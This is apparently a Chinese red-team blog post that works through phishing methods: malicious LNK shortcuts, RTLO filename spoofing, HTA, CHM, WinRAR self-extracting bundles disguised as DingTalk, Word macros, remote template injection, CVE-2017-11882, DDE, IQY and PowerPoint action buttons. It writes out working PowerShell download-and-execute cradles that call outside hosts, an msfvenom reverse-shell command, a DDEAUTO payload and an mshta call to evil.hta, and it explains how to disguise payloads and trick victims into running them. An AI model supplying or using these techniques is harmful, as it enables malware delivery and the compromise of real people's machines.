前言
红蓝对抗之钓鱼,尝试几种钓鱼方式
钓鱼小技巧
LNK快捷方式
lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
然后cs会生成powershell
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://150.158.181.145:80/a'))" |
创建快捷方式
更改图标进行伪装
%SystemRoot%\System32\SHELL32.dll |
RTLO反转文件名
RTLO 字符全名为 “RIGHT-TO-LEFT OVERRIDE”,其本质是 unicode 字符。可以将任意语言的文字内容按倒序排列,最初是用来支持一些从右往左写的语言的文字,比如阿拉伯语,希伯来语。由于它可以重新排列字符的特性,会被攻击者利用从而达到欺骗目标
将rtlo.exe(.scr等同于.exe)重命名为 rtlogpj.exe,然后再次重命名,在o和g中右键选择RLO即可
效果:
HTA
HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,本身就是html应用程序,双击就能运行,却比普通网页权限大得多,它具有桌面程序的所有权限,与VB、C++等程序语言所设计的软件界面没什么差别。
新建一个后缀为 .hta的HTA,输入以下
<!--example1.hta--> |
运行
CS可以直接生成
有三种方式的利用方式
powershell:执行powershell语句
<script language="VBScript"> |
exe:将shellcode写入到exe中
VBA:
CHM
CHM(Compiled Help Manual)即 “已编译的帮助文件”。它是微软新一代的帮助文件格式,利用 HTML 作源文,把帮助内容以类似数据库的形式编译储存。CHM 支持 Javascript、VBscript、ActiveX、Java Applet、Flash、常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,并可以通过 URL 与 Internet 联系在一起。因为使用方便,形式多样也被采用作为电子书的格式。主要针对windows利用
利用需要用到 EasyCHM
新建html然后填入代码,CS上线,利用web delivery
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> |
导入项目
然后编译
先将一个正常的chm文档下载,利用hh命令转为html,然后将payload嵌入,再生成chm,红队攻防之CHM文档钓鱼
hh -decompile .\\html CSS2.0中文手册.chm |
自解压捆绑
将CS的马和正常软件,利用winrar进行压缩
1.创建自解压格式压缩文件
2.高级->自解压选项
3.选项设置
解压路径填temp目录
在 设置 中的解压后运行”输入要运行的程序
在 模式 中 安静模式 选择 全部隐藏 。
在 更新 中的 更新方法 选择 解压并更新文件 ,覆盖方式 中选择 覆盖所有文件 。
重命名为dingding.exe,可以再换个图标,然后和钉钉混淆再次压缩
然后解压
然后发送给鱼儿,鱼儿点击dingding.exe后就上线
Office钓鱼
word宏
CS生成
msf生成
msfvenom -pwindows/meterpreter/reverse_tcp LHOST=192.168.2.148 LPORT=4444-fvba -ovba.txt |
复制vba代码后,新建word,选择自定义功能区
点击开发工具 Visual Basic ->ThisDocument。填入宏代码
另存为.doc文件
默认为禁用宏,诱导用户点击启用内容
关于宏的免杀还需要下一步的学习
远程模板注入宏代码
注入代码同上,另存为.dotm,上传到vps中
现在需要一个通过网络来加载一个word模板的文件,最简单的方式就是通过word的联机模板,打开word,新建模板
保存后重命名为zip,修改 word\_rels\settings.xml.rels
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> |
包含带有attachmentTemplate的Type的Relationship标记,是告诉Word打开该.docx时从哪里加载模板的设置,我们可以将Target值修改为远程位置。SMB也可以利用
vps收到远程请求,点击启用宏即可上线
CVE-2017-11882
此漏洞是由Office软件里面的公式编辑器造成的,即EQNEDT32.EXE程序,这个程序运行的过程中,读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞,攻击者通过构造特殊的字符,可以实现任意代码执行。
范围:Office 2003到2016的所有版本
- MicrosoftOffice 2000
- MicrosoftOffice 2003
- MicrosoftOffice 2007 Service Pack 3
- MicrosoftOffice 2010 Service Pack 2
- MicrosoftOffice 2013 Service Pack 1
- MicrosoftOffice 2016
github-poc
https://github.com/Ridter/CVE-2017-11882 |
word插入外部对象(OLE)
插入对象,可以准备个word的ico,替换图标
双击运行
DDE
鱼叉钓鱼:利用 Office 文档进行 DDE 攻击 - 云+社区 - 腾讯云 (tencent.com)
动态数据交换(DDE) 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。
首先通过 word 文档设置一个域代码:crlt+f9,或者选中插入 - 文件部件 - 域,选中第一个 = (Formula) 然后右键切换域代码来编辑代码
CS 生成远程生成powershell
DDEAUTO"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.2.148:8000/beacon.ps1'); # ""Microsoft Document Security Add-On" |
需要点击两次是
IYQ
可以将IYQ简单的理解成内置在excel中的一种特殊 web浏览器 (不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用excel制作钓鱼邮件的机会,假如你要引入的web数据是入侵者事先准备好的一段payload iqy恶意代码,那结果就不言而喻了。
office 2016:数据-> 来自网站
其他方式
regsv*** |
上线,利用工具 nishang:https://github.com/samratashok/nishang/releases
具体利用过程:Excel的IYQ钓鱼 - AskTa0 - 博客园 (cnblogs.com)
PPT动作
插入最后一个空白动作按钮
设置触发动作为运行程序,这里利用hta上线
c:\Windows\System32\mshta.exe http://150.158.181.145:8000/evil.hta |
右键设置形状格式,变为透明隐藏格式
触发时会弹窗提示,点击启用上线
